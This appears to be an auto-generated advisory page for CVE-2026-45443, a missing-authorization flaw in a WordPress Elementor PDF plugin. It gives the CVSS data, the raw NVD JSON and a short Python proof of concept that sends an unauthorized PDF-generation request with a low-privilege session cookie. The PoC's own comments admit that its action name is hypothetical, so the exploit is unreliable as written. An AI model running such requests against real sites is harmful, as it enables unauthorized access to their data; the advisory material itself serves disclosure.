Security Vulnerability Report
中文
CVE-2026-45443 CVSS 5.0 MEDIUM

CVE-2026-45443

Published: 2026-05-20 13:16:36
Last Modified: 2026-05-20 13:54:55

Description

Missing Authorization vulnerability in ADD-ONS.ORG PDF for Elementor Forms + Drag And Drop Template Builder allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects PDF for Elementor Forms + Drag And Drop Template Builder: from n/a through 5.5.1.

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

PDF for Elementor Forms + Drag And Drop Template Builder <= 5.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_url = "http://example.com/wp-admin/admin-ajax.php" # The vulnerable action might be related to PDF generation or template export # Usually requires a nonce, but in IDOR/Missing Auth, it might be bypassable or predictable payload = { "action": "pdf_elementor_generate_pdf", # Hypothetical action name based on plugin "form_id": "1", "template_id": "1" } # Attacker cookies (low privilege session) cookies = { "wordpress_logged_in_...": "low_priv_user_session_hash" } try: response = requests.post(target_url, data=payload, cookies=cookies, timeout=10) if response.status_code == 200 and "%PDF" in response.text: print("[+] Exploit successful! Unauthorized PDF generated.") print("[+] Response snippet:", response.text[:100]) else: print("[-] Exploit failed or target not vulnerable.") print("[+] Status Code:", response.status_code) except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45443", "sourceIdentifier": "[email protected]", "published": "2026-05-20T13:16:36.267", "lastModified": "2026-05-20T13:54:54.890", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in ADD-ONS.ORG PDF for Elementor Forms + Drag And Drop Template Builder allows Exploiting Incorrectly Configured Access Control Security Levels.\n\nThis issue affects PDF for Elementor Forms + Drag And Drop Template Builder: from n/a through 5.5.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/pdf-for-elementor-forms/vulnerability/wordpress-pdf-for-elementor-forms-drag-and-drop-template-builder-plugin-5-5-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}